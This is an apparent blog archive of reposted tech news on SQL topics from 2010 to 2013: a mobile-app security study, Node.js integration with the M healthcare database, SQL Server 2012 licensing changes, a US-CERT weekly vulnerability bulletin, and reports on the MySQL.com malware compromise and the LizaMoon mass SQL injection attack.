Archive for the ‘SQL’ Category

HP: 90 percent of Apple iOS mobile apps show security vulnerabilities

Tuesday, November 19th, 2013

HP today said security testing it conducted on more than 2,000 Apple iOS mobile apps developed for commercial use by some 600 large companies in 50 countries showed that nine out of 10 had serious vulnerabilities.

Mike Armistead, HP vice president and general manager, said testing was done on apps from 22 iTunes App Store categories that are used for business-to-consumer or business-to-business purposes, such as banking or retailing. HP said 97 percent of these apps inappropriately accessed private information sources within a device, and 86 percent proved to be vulnerable to attacks such as SQL injection.

The Apple guidelines for developing iOS apps help developers but this doesn’t go far enough in terms of security, says Armistead. Mobile apps are being used to extend the corporate website to mobile devices, but companies in the process “are opening up their attack surfaces,” he says.

In its summary of the testing, HP said 86 percent of the apps tested lacked the means to protect themselves from common exploits, such as misuse of encrypted data, cross-site scripting and insecure transmission of data.

The same number did not have optimized security built in the early part of the development process, according to HP. Three quarters “did not use proper encryption techniques when storing data on mobile devices, which leaves unencrypted data accessible to an attacker.” A large number of the apps didn’t implement SSL/HTTPS correctly.To discover weaknesses in apps, developers need to involve practices such as app scanning for security, penetration testing and a secure coding development life-cycle approach, HP advises.

The need to develop mobile apps quickly for business purposes is one of the main contributing factors leading to weaknesses in these apps made available for public download, according to HP. And the weakness on the mobile side is impacting the server side as well.

“It is our earnest belief that the pace and cost of development in the mobile space has hampered security efforts,” HP says in its report, adding that “mobile application security is still in its infancy.”

Source:  infoworld.com

Node.js integrates with M: Next big thing in healthcare IT

Thursday, February 7th, 2013

Join the M revolution and the next big thing in healthcare IT: the integration of the node.js programming language with the NoSQL hierarchical database, M.

M was developed to organize and access with high efficiency the type of data that is typically managed in healthcare, thus making it uniquely well-suited for the job.

One of the biggest reasons for the success of M is that it integrates the database into the language in a natural and seamless way. The growth and involvement of the community of M developers however, has been below the radar for educators and the larger IT community. As a consequence it has been facing challenges for recruiting young new developers, despite the critical importance of this technology for supporting the Health IT infrastructure of the US.

At the recent 26th VistA Community Meeting, an exciting alternative was presented by Rob Tweed. I summarize it as: Node.js meets the M Database.

In his work, Rob has created an intimate integration between the M database and the language features of node.js. The result is a new way of accessing the M database from JavaScript code in such a way that the developer doesn’t feel that is accessing a database.

It is now possible to access M from node.js, both when using the M implementation of Intersystems Cache and with the open source M implementation of GT.M. This second interface was implemented by David Wicksell, based on the API previously defined for Cache in the GlobalsDB project.

In a recent blog post, Rob describes some of the natural notation in node.js that provides access to the M hierarchical database by nicely following the language patterns of JavaScript. Here are some of Rob’s examples:

The M expression:

set town = ^patient(123456, "address", "town")

becomes the JavaScript expression:

 var town = patient.$('address').$('town')._value;

with some flavor of jQuery.

The following M expression of a healthcare typical example:

^patient(123456,"birthdate")=-851884200
^patient(123456,"conditions",0,"causeOfDeath")=""
^patient(123456,"conditions",0,"codes","ICD-10-CM",0)="I21.01"
^patient(123456,"conditions",0,"codes","ICD-9-CM",0)="410.00"
^patient(123456,"conditions",0,"description")="Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)"
^patient(123456,"conditions",0,"end_time")=1273104000

becomes the following JSON datastructure that can be manipulated with Javascript:

var patient = new ewd.GlobalNode("patient", [123456]);
patient._delete();

var document = {
  "birthdate": -851884200,
  "conditions": [
    {
      "causeOfDeath": null,
      "codes": {
        "ICD-9-CM": [
          "410.00"
        ],
        "ICD-10-CM": [
          "I21.01"
        ]
      },
      "description": "Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)",
      "end_time": 1273104000
    }
  ]
};

More detailed examples are provided in Rob’s blog post. The M module for node.js is available here.

What this achieves is seamless integration between the powerful M hierarchical database and the language features of the very popular node.js implementation of JavaScript. This integration becomes a great opportunity for hundreds of node.js developers to join the space of healthcare IT, and to do, as Tim O’Reilly advises: Work on Stuff that Matters!

M is currently being used in hundreds of hospitals in the public sector:

  • The Department of Veterans Affairs
  • The Department of Defense
  • The Indian Health Service

As well as hundreds of hospitals in the private sector:

  • Kaiser Permanente hospital system
  • Johns Hopkins
  • Beth Israel Deaconess Medical Center
  • Harvard Medical School

In particular at deployments of these EHR systems:

  • Epic
  • GE/Centricity
  • McKesson
  • Meditech

Given this, and the large popularity of JavaScript and the high efficiency of node.js, this may be the most significant event happening in healthcare IT in recent years.

If you are an enthusiast of node.js, or you are looking for the best next language to learn, or you want to do some social good, this could be the thing for you.

Source:  opensource.com

Is application security the glaring hole in your defense?

Tuesday, March 27th, 2012

When it comes to security, a large number of organizations have a glaring hole in their defenses: their applications.

A recent study of more than 800 IT security and development professionals reports that most organizations don’t prioritize application security as a discipline, despite the fact that SQL injection attacks are the highest root cause of data breaches. The second-highest root cause is exploited vulnerable code in Web 2.0/social media applications.

Sixty-eight percent of developers’ organizations and 47 percent of security practitioners’ organizations suffered one or more data breaches in the past 24 months due to hacked or compromised applications. A further 19 percent of security practitioners and 16 percent of developers were uncertain if their organization had suffered a data breach due to a compromised or hacked application. Additionally, only 12 percent of security practitioners and 11 percent of developers say all their organizations’ applications meet regulations for privacy, data protection and information security.

Despite the data breaches resulting from hacked or compromised applications and the lack of compliance with regulations, 38 percent of security practitioners and 39 percent of developers say less than 10 percent of the IT security budget is dedicated to application security.

“We set out to measure the tolerance to risk across the established phases of application security, and define what works and what hasn’t worked, how industries are organizing themselves and what gaps exist,” says Dr. Larry Ponemon, CEO of the Ponemon Institute, the research firm that conducted the study on the behalf of security firm Security Innovation. “We accomplished that, but what we also found was a drastic divide between the IT security and development organizations that is caused by a major skills shortage and a fundamental misunderstanding of how an application security process should be developed. This lack of alignment seems to hurt their business based on not prioritizing secure software, but also not understanding what to do about it.”

The study found that security practitioners and developers were far apart in their perception of the issue. While one might expect that security practitioners held the more cynical views with regard to application security, in fact the opposite was true. Dr. Ponemon says 71 percent of developers say application security was not adequately emphasized during the application development lifecycle, compared with 49 percent of security practitioners who felt the same way. Additionally, 46 percent of developers say their organization had no process for ensuring security is built into new applications, while only 21 percent of security practitioners believed that to be the case.

Developers and security practitioners are also divided on the issue of remediating vulnerable code. Nearly half (47 percent) of developers say their organization have no formal mandate to remediate vulnerable code, while 29 percent of security practitioners say the same.

“What emerged in this study was that companies don’t seem to be looking at the root causes of data breaches, and they aren’t moving very fast to bridge the existing gaps to fix the myriad of problems,” says Ed Adams, CEO of Security Innovation. “The threat landscape has grown substantially in scope, most notably as our survey respondents stated that Web 2.0 and mobile attacks are the targets of the next wave of threats beyond just web applications.”

The survey also found that nearly half of developers say there is no collaboration between their development organization and the security organization when it comes to application security. That’s a stark contrast from the 19 percent of security practitioners that say there is no collaboration.

Lack of Collaboration in Application Security

“We basically found that developers were much more likely to think there was a lack of collaboration,” Dr. Ponemon says. “The security folks, on the whole, thought the collaboration was OK. I think that one of the biggest problems is that the security folks think they’re getting the word out on collaborating or helping, but they’re not doing so effectively.”

In other words, Dr. Ponemon says, the security organization writes its security policy and gives it to developers, but the developers, by and large, don’t understand how to implement that policy. The security organizations think they’ve done their job, but they haven’t managed to make their policy contextual for developers.

“We find that process has no bearing whatsoever on the ability of an organization to write secure code,” Dr. Ponemon says. “It doesn’t take any longer to write a line of secure code than it does to write a line of insecure code. You just have to know which one to write.”

Education Is Key to Application Security

But knowing which line of code to write seems to be a large part of the problem. The study found that only 22 percent of security practitioners and 11 percent of developers say their organization has a fully deployed application security training program. Fully 36 percent of security practitioners and 37 percent of developers say their organization had no application security training program and no plans to deploy one.

Adams believes providing that education will go a long way toward helping organizations secure their applications and minimize the risk.

“This is more of an education problem than anything else,” Adams says. “In the late 90s, everybody was putting their applications on the web. But they kept on crashing. It was really a performance problem: The developers didn’t know how to code for performance. Amazingly, that’s what’s happening in the world today. Organizations are buying application security tools before they get application security training. You have to get trained on the technique first.”

Source:  networkworld.com

Oracle claims new MySQL Cluster does 1 billion queries per minute—in NoSQL

Friday, February 17th, 2012

Oracle has announced the general availability of MySQL Cluster 7.2 as a GPL download, and claims to have achieved a benchmark of 1 billion queries per minute and 110 million updates per minute on an eight-server cluster. Those results, based on the flexAsynch test in the DBT-2 benchmark, were attained using a new NoSQL NDB C++ API.

Mikael Ronstrom, senior MySQL architect at Oracle, described the test rig for the benchmark in a blog post on February 15. He said that the server cluster used in the test ran on eight two-socket servers, each running one data node, “using X5670 with Infiniband interconnect and 48GB of memory per machine.” Ten other machines ran the flexAsynch queries against the cluster.

In the flexAsynch test, “each read is a transaction consisting of a read of an entire row consisting of 25 attributes, each 4 bytes in size,” he wrote. “flexAsynch uses the asynchronous feature of the NDB API which enables one thread to send off multiple transactions in parallel. This is handled similarly to how Node.js works with callbacks registered that reports back when a transaction is completed.”

The results were a eight-fold improvement from a similar benchmark ran by Oracle last year. But given that there aren’t any published results anywhere else for flexAsynch scores from any other vendor, it’s hard to say exactly what these results mean, or how the performance compares to other open-source NoSQL databases.

Source:  arstechnica.com

Microsoft to move to license-by-core for SQL Server 2012

Wednesday, November 16th, 2011

Hmmm…think back to 2005, Microsoft is marketing its plans to release a new version of Microsoft SQL Server (2005) –remember how Microsoft executives were swearing that “unlike Oracle”, they would never count the number of cores, only the number of physical processors? Well, Oracle changed its licensing model in 2008 and in 2012 so will Microsoft. But in reverse – Oracle got a bit looser and Microsoft will be getting tighter.

With the release of Microsoft SQL Server 2012 (projected for first half of 2012), Microsoft is changing some recent and some long standing licensing rules.  The following is based upon the licensing details released by Microsoft as of November 3, 2011. Things can change, so make sure you’re looking at the most current documentation (and I’ll try to keep you current here as well).

Microsoft SQL Server Editions:

  1. Enterprise Edition – license only as per core model (last day to buy Enterprise Edition in Server/CAL model is 6/30/2012 with some potential exceptions for existing agreements – see “Software Assurance Implications” below).
  2. Business Intelligence – included in the Enterprise Edition or license separately but only as server/CAL (Client Access License)
  3. Standard Edition – license in either server/CAL or per core model.
  4. Additional editions without licensing changes:
    1. Web Edition (only available for hosting companies through the SPLA agreement)
    2. Developer
    3. Express
    4. Compact
  5. Discontinued editions:
    1. Datacenter (migrate to Enterprise)
    2. Workgroup (migrate to Standard)
    3. Standard for Small Business (migrate to Standard)

For more information on what these editions can (and can’t) do, take a look at the edition comparison.

Core versus Processor Licensing:

Prior to SQL Server 2012 (going back as far as SQL Server 2000), Microsoft SQL Server could be purchased as either a Server/CAL licensing model or a (physical) Processor licensing model. Under the Server/CAL model the server was licensed and each user (person or device) needed a CAL. For situations where the number of users was large or could not be counted, Processor licensing was more appropriate as it licensed the server by physical processors regardless of the number of users.

For example, one of my clients has their SQL Server environment running on a quad processor box with each processor having 10 cores. They are running all of their SQL on this environment (approximately 15 virtual servers).  To license this under Microsoft SQL Enterprise 2008R2 they licensed it with 4 processor licenses (each allowing up to 4 virtuals of either Standard or Enterprise).  To license under Microsoft SQL Server Enterprise 2012 they would license it as 40 (4×10) core licenses. (See the note about “Software Assurance Implications” below).  However; under the 2012 licensing this would now allow them to have unlimited virtuals (and since they licensed it with Microsoft Windows Datacenter edition for the operating system they are covered there as well).

Core based licenses will be sold in two core packs. According to Microsoft, the cost for a core license will be priced at ¼ the price of a SQL Server 2008R2 processor license. So, if you’re running a ratio of 4 cores per physical processor the end cost for you shouldn’t change – but anything more than that and your costs will be going up.

Physical:

  1. All cores in the server must be licensed
  2. A minimum of 4 core licenses required for each physical processor

Virtual:

  1. Individual virtual machines may be licensed (as opposed to all cores in the physical server)
  2. A minimum of 4 core licenses per virtual machine

Virtualization:

Microsoft SQL Server 2012 will handle virtualization under two options:

  1. License individual virtual machines (either by server/CAL or by core)
    1. Remember, there is a minimum of 4 core licenses per virtual machine.
  2. License the physical machine for all virtual machines by licensing by physical core andpurchasing/maintaining Microsoft Software Assurance.
    1. Licensing this way allows for unlimited virtual machines (this is referring to SQL Server only, don’t forget you still have to license the Microsoft Windows Operating System).
    2. Note the requirement to have SA in order to license all virtuals!

Software Assurance Implications

For customers who have active Microsoft Software Assurance (SA) on their SQL Server licenses as of the release of Microsoft SQL Server 2012, there are some special rules and benefits (read: evaluate your environment to see if you need to acquire some licenses with SA before the release).

Existing SQL Server Processor licenses (Standard or Enterprise) with SA:

May upgrade to SQL Server 2012 at no additional cost.
At the end of the SA benefit term, these licenses will transition to Core licenses at a minimum of 4 core licenses per processor or for the actual number of cores in use. Customers who are using more than should perform a self-inventory (with a tool that will provide an accurate time/date stamped inventory of hardware tied to the SQL Server installations) to ensure that they have documentation to receive all of the core licenses that they are entitled to receive.

Existing SQL Datacenter Processor licenses with SA:

Same as above for Standard or Enterprise but the conversion is a minimum of 8 core Enterprise Edition licenses.

Existing SQL Server Enterprise Edition Server/CAL with SA:

May upgrade to SQL Server 2012 at no additional cost and Enterprise Edition server SA can be maintained through end of term. However; these servers are limited to a 20 core per server license maximum.

At the end of the SA benefit term, these licenses will transition to Core licenses at a minimum of 4 core licenses per processor or for the actual number of cores in use up to the maximum of 20 outlined above. Customers who are using more than should perform a self-inventory (with a tool that will provide an accurate time/date stamped inventory of hardware tied to the SQL Server installations) to ensure that they have documentation to receive all of the core licenses that they are entitled to receive.

Special Rules for Volume Licensing:

Enterprise and Enrollment for Enterprise Application (EAP) agreements that have SQL Server Enterprise enrolled as a product: Can continueto purchase Enterprise edition as Server/CAL or Processor license through the end of their agreement term. At the end of the agreement the licenses will transition to Core licenses as outlined above for SA benefits.

Please note, this right to continue purchasing the Enterprise edition as Server/CAL or Processor license does not apply to Microsoft Select or Select Plus customers unless SQL is on a current EA or EAP.

In my opinion, this is a major change in Microsoft licensing so there is every possibility that things might change a bit between now and when the product is actually released. I recommend making sure you are receiving up to date information and are pre-planning for how this change will impact your organization as there are some opportunities to leveraging SA benefits at time of license conversion.

FYI, for those wondering…no – as of this time there is no indication that this type of licensing change will be applied to other Microsoft software…but remember, licensing terms are constantly changing!

Source:  networkworld.com

Hacked MySQL.com used to serve Windows malware

Tuesday, September 27th, 2011

The MySQL site, whose open-source repository serves some of the most popular Web sites, has been hacked and was being used to serve malware to visitors running Windows before it was cleaned up today, a security firm said.

Armorize Chief Executive Wayne Huang and some of his firm’s researchers warned about the attack in a blog post today.

MySQL.com acted quickly to remove the malware so computers would stop getting infected, but Huang told CNET he did not know how long site visitors were vulnerable or how many may have been infected. Armorize estimated that MySQL.com gets more than 100,000 page views a day and more than 34,000 unique daily visitors.

“The infection rate tends to be high for these types of attacks,” he said. “They handled it very quickly but that doesn’t mean they cleaned up the backdoors the attackers left” on the site.

Huang said he did not know how dangerous an infection would be to a computer that was hit with one, except to say that the malware would be very difficult to clean up and would still be running on the machine even after a reboot.

“We haven’t gone in depth in analyzing what this particular piece of malware does,” he said. “We know it changes some of your Windows .dlls (Dynamic-link libraries), probably to make sure it is permanently installed and running all the time. You may be able to clean it up, but it won’t be a trivial process.”

MySQL.com representatives could not be reached for comment this afternoon. Representatives from Oracle, which owns MySQL.com, did not immediately respond to e-mails and calls seeking comment.

Before the infection was removed, the compromise redirected traffic to a BlackHole exploit pack that forces the browser to install a piece of malware on the machine, according to the Armorize Malware Blog.

“It exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java,…), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,” the blog says. “The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”

The Armorize blog also has a video showing how a visitor’s machine could have gotten infected from the MySQL.com site. Only 4 out of 44 vendors on VirusTotal site can detect the malware, Armorize said.

Meanwhile, Brian Krebs of the Krebs on Security blog said he had noticed someone selling administrative access to MySQL.com on an exclusive Russian underground hacker forum a few days ago for $3,000.

“I think it’s very likely that it’s related, esp with these Russian forums,” said Huang.

Source:  CNET

Vulnerability Summary for the Week of July 25, 2011

Monday, August 1st, 2011

National Cyber Alert System
Cyber Security Bulletin SB11-213

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cyber Security Division (NCSD) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0
  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9
  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

High Vulnerabilities
Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
azeotech — daqfactory AzeoTech DAQFactory before 5.85 (Build 1842) does not perform authentication for certain signals, which allows remote attackers to cause a denial of service (system reboot or shutdown) via a signal. 2011-07-28 7.8 CVE-2011-2956
ca — gateway_security Icihttp.exe in CA Gateway Security for HTTP, as used in CA Gateway Security 8.1 before 8.1.0.69 and CA Total Defense r12, does not properly parse URLs, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and daemon crash) via a malformed request. 2011-07-28 10.0 CVE-2011-2667
cisco — sa500_software The web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote authenticated users to execute arbitrary commands via crafted parameters to web forms, aka Bug ID CSCtq65681. 2011-07-28 9.0 CVE-2011-2547
cisco — asr_9006_router Unspecified vulnerability in Cisco IOS XR 4.1.x before 4.1.1 on Cisco Aggregation Services Routers (ASR) 9000 series devices allows remote attackers to cause a denial of service (line-card reload) via an IPv4 packet, aka Bug ID CSCtr26695. 2011-07-28 7.8 CVE-2011-2549
drupal — drupal Drupal 7.x before 7.3 allows remote attackers to bypass intended node_access restrictions via vectors related to a listing that shows nodes but lacks a JOIN clause for the node table. 2011-07-26 7.5 CVE-2011-2687
gimp — gimp Heap-based buffer overflow in the read_channel_data function in file-psp.c in the Paint Shop Pro (PSP) plugin in GIMP 2.6.11 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a PSP_COMP_RLE (aka RLE compression) image file that begins a long run count at the end of the image. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4543. 2011-07-26 7.5 CVE-2011-1782
google — picasa Google Picasa before 3.6 Build 105.67 does not properly handle invalid properties in JPEG images, which allows remote attackers to execute arbitrary code via a crafted image file. 2011-07-28 9.3 CVE-2011-2747
ibm — lotus_symphony Multiple unspecified vulnerabilities in IBM Lotus Symphony 3 before FP3 have unknown impact and attack vectors, related to “critical security vulnerability issues.” 2011-07-27 10.0 CVE-2011-2884
jan_wolter — mod_authnz_external SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field. 2011-07-28 7.5 CVE-2011-2688
nrl — opie Multiple off-by-one errors in opiesu.c in opiesu in OPIE 2.4.1-test1 and earlier might allow local users to gain privileges via a crafted command line. 2011-07-26 7.2 CVE-2011-2489
nrl — opie opielogin.c in opielogin in OPIE 2.4.1-test1 and earlier does not check the return value of the setuid system call, which allows local users to gain privileges by arranging for an account to already be running its maximum number of processes. 2011-07-26 7.2 CVE-2011-2490
Back to top

Medium Vulnerabilities
Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
chyrp — chyrp upload_handler.php in the swfupload extension in Chyrp 2.0 and earlier relies on client-side JavaScript code to restrict the file extensions of uploaded files, which allows remote authenticated users to upload a .php file, and consequently execute arbitrary PHP code, via a write_post action to the default URI under admin/. 2011-07-26 6.5 CVE-2011-2745
cisco — sa500_software SQL injection vulnerability in the web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtq65669. 2011-07-28 5.0 CVE-2011-2546
debian — apt APT before 0.8.15.2 does not properly validate inline GPG signatures, which allows man-in-the-middle attackers to install modified packages via vectors involving lack of an initial clearsigned message. 2011-07-26 4.3 CVE-2011-1829
ecava — integraxor Multiple cross-site scripting (XSS) vulnerabilities in Ecava IntegraXor before 3.60 (Build 4080) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. 2011-07-28 4.3 CVE-2011-2958
fabfile — fabric Fabric before 1.1.0 allows local users to overwrite arbitrary files via a symlink attack on (1) a /tmp/fab.*.tar file or (2) certain other files in the top level of /tmp/. 2011-07-26 4.4 CVE-2011-2185
google — search_appliance Cross-site scripting (XSS) vulnerability in Google Search Appliance before 5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. 2011-07-28 4.3 CVE-2011-1339
ibm — lotus_symphony IBM Lotus Symphony 3 before FP3 allows remote attackers to cause a denial of service (application crash) via the sample .doc document that incorporates a user-defined toolbar. 2011-07-27 4.3 CVE-2011-2885
ibm — lotus_symphony IBM Lotus Symphony 3 before FP3 allows remote attackers to cause a denial of service (application crash) via a .docx document with empty bullet styles for parent bullets. 2011-07-27 4.3 CVE-2011-2886
ibm — lotus_symphony IBM Lotus Symphony 3 before FP3 on Linux allows remote attackers to cause a denial of service (application crash) via a certain sample document. 2011-07-27 4.3 CVE-2011-2887
ibm — lotus_symphony IBM Lotus Symphony 3 before FP3 allows remote attackers to cause a denial of service (application hang) via complex graphics in a presentation. 2011-07-27 4.3 CVE-2011-2888
ibm — lotus_symphony The DataPilot feature in IBM Lotus Symphony 3 before FP3 allows user-assisted remote attackers to cause a denial of service (application crash) via a large .xls spreadsheet with an invalid Value reference. 2011-07-27 4.3 CVE-2011-2893
joomla — joomla! Joomla! before 1.5.23 does not properly check for errors, which allows remote attackers to obtain sensitive information via unspecified vectors. 2011-07-27 5.0 CVE-2011-2488
joomla — joomla! Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.6.4 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the com_contact component, as demonstrated by the Itemid parameter to index.php; (2) the query string to the com_content component, as demonstrated by the filter_order parameter to index.php; (3) the query string to the com_newsfeeds component, as demonstrated by an arbitrary parameter to index.php; or (4) the option parameter in a reset.request action to index.php; and, when Internet Explorer or Konqueror is used, (5) allow remote attackers to inject arbitrary web script or HTML via the searchword parameter in a search action to index.php in the com_search component. 2011-07-27 4.3 CVE-2011-2509
joomla — joomla! Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the URI to includes/application.php, reachable through index.php; and, when Internet Explorer or Konqueror is used, (2) allow remote attackers to inject arbitrary web script or HTML via the searchword parameter in a search action to index.php in the com_search component. NOTE: vector 2 exists because of an incomplete fix for CVE-2011-2509.5. 2011-07-27 4.3 CVE-2011-2710
joomla — joomla! templates/system/error.php in Joomla! before 1.5.23 might allow remote attackers to obtain sensitive information via unspecified vectors that trigger an undefined value of a certain error field, leading to disclosure of the installation path. NOTE: this might overlap CVE-2011-2488. 2011-07-27 5.0 CVE-2011-2889
joomla — joomla! The MediaViewMedia class in administrator/components/com_media/views/media/view.html.php in Joomla! 1.5.23 and earlier allows remote attackers to obtain sensitive information via vectors involving the base variable, leading to disclosure of the installation path, a different vulnerability than CVE-2011-2488. 2011-07-27 5.0 CVE-2011-2890
joomla — joomla! Joomla! 1.6.x before 1.6.2 allows remote attackers to obtain sensitive information via an empty Itemid array parameter to index.php, which reveals the installation path in an error message, a different vulnerability than CVE-2011-2488. 2011-07-27 5.0 CVE-2011-2891
joomla — joomla! Joomla! 1.6.x before 1.6.2 does not prevent page rendering inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site. 2011-07-27 4.3 CVE-2011-2892
likewise — likewise_open SQL injection vulnerability in lsassd in Lsass in the Likewise Security Authority in Likewise Open 5.4 through 6.1, and Likewise Enterprise 6.0, allows local users to execute arbitrary SQL commands via unspecified vectors. 2011-07-26 5.8 CVE-2011-2467
linux — kernel The gfs2_fallocate function in fs/gfs2/file.c in the Linux kernel before 3.0-rc1 does not ensure that the size of a chunk allocation is a multiple of the block size, which allows local users to cause a denial of service (BUG and system crash) by arranging for all resource groups to have too little free space. 2011-07-28 4.9 CVE-2011-2689
linux — kernel Multiple off-by-one errors in the ext4 subsystem in the Linux kernel before 3.0-rc5 allow local users to cause a denial of service (BUG_ON and system crash) by accessing a sparse file in extent format with a write operation involving a block number corresponding to the largest possible 32-bit unsigned integer. 2011-07-28 4.9 CVE-2011-2695
mega-nerd — libsndfile Integer overflow in libsndfile before 1.0.25 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PARIS Audio Format (PAF) file that triggers a heap-based buffer overflow. 2011-07-26 6.8 CVE-2011-2696
redhat — network_satellite_server Cross-site request forgery (CSRF) vulnerability in the Spacewalk Java site packages (aka spacewalk-java) 1.2.39 in Spacewalk, as used in the server in Red Hat Network Satellite 5.3.0 through 5.4.1 and other products, allows remote attackers to hijack the authentication of arbitrary users for requests that (1) disable the current user account, (2) add user accounts, or (3) modify user accounts to have administrator privileges. 2011-07-26 6.8 CVE-2009-4139
redhat — jboss_enterprise_application_platform jboss-seam.jar in the JBoss Seam 2 framework 2.2.x and earlier, as distributed in Red Hat JBoss Enterprise SOA Platform 4.3.0.CP04 and 5.1.0 and JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.3.0.CP09 and 5.1.0, does not properly restrict use of Expression Language (EL) statements in FacesMessages during page exception handling, which allows remote attackers to execute arbitrary Java code via a crafted URL to an application. 2011-07-26 6.8 CVE-2011-1484
redhat — jboss_enterprise_application_platform jboss-seam.jar in the JBoss Seam 2 framework 2.2.x and earlier, as distributed in Red Hat JBoss Enterprise SOA Platform 4.3.0.CP05 and 5.1.0; JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.3.0, 4.3.0.CP09, and 5.1.1; and JBoss Enterprise Web Platform 5.1.1, does not properly restrict use of Expression Language (EL) statements in FacesMessages during page exception handling, which allows remote attackers to execute arbitrary Java code via a crafted URL to an application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1484. 2011-07-26 6.8 CVE-2011-2196
rockwellautomation — factorytalk_diagnostics_viewer Unspecified vulnerability in Rockwell Automation FactoryTalk Diagnostics Viewer before V2.30.00 (CPR9 SR3) allows local users to execute arbitrary code via a crafted FactoryTalk Diagnostics Viewer (.ftd) configuration file, which triggers memory corruption. 2011-07-28 6.9 CVE-2011-2957
videolan — vlc_media_player Heap-based buffer overflow in the DemuxAudioSipr function in real.c in the RealMedia demuxer in VideoLAN VLC media player 1.1.x before 1.1.11 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Real Media file. 2011-07-26 6.8 CVE-2011-2587
videolan — vlc_media_player Heap-based buffer overflow in the AVI_ChunkRead_strf function in libavi.c in the AVI demuxer in VideoLAN VLC media player before 1.1.11 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted AVI media file. 2011-07-26 6.8 CVE-2011-2588
Back to top

Low Vulnerabilities
Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
linux — kernel The bluetooth subsystem in the Linux kernel before 3.0-rc4 does not properly initialize certain data structures, which allows local users to obtain potentially sensitive information from kernel memory via a crafted getsockopt system call, related to (1) the l2cap_sock_getsockopt_old function in net/bluetooth/l2cap_sock.c and (2) the rfcomm_sock_getsockopt_old function in net/bluetooth/rfcomm/sock.c. 2011-07-28 1.9 CVE-2011-2492

Source:  CERT.org

 

Massive SQL injection attack making the rounds—694K URLs so far

Friday, April 1st, 2011

Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.

The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to directly perform actions against databases, are largely independent of the technology used to develop the applications themselves: the programming errors that allow SQL injection can be made in virtually any language. The underlying cause is a programmer trusting input that comes from a Web page—either a value from a form, or a parameter in a URL—and passing this input directly into the database. If the input is malformed in a particular way, the result is that the database will run code of the attacker’s choosing.

In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically “http://lizamoon.com/ur.php” or more recently, “http://alisa-carter.com/ur.php.” Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.

The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times more URLs are infected, and the numbers are still growing.

The injected code is also found on a number of product pages on Apple’s iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple’s system. However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified.

SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands. In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia.

It’s been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.

Source:  arstechnica.com

MSDN: Creating databases in Visual Basic

Monday, December 27th, 2010

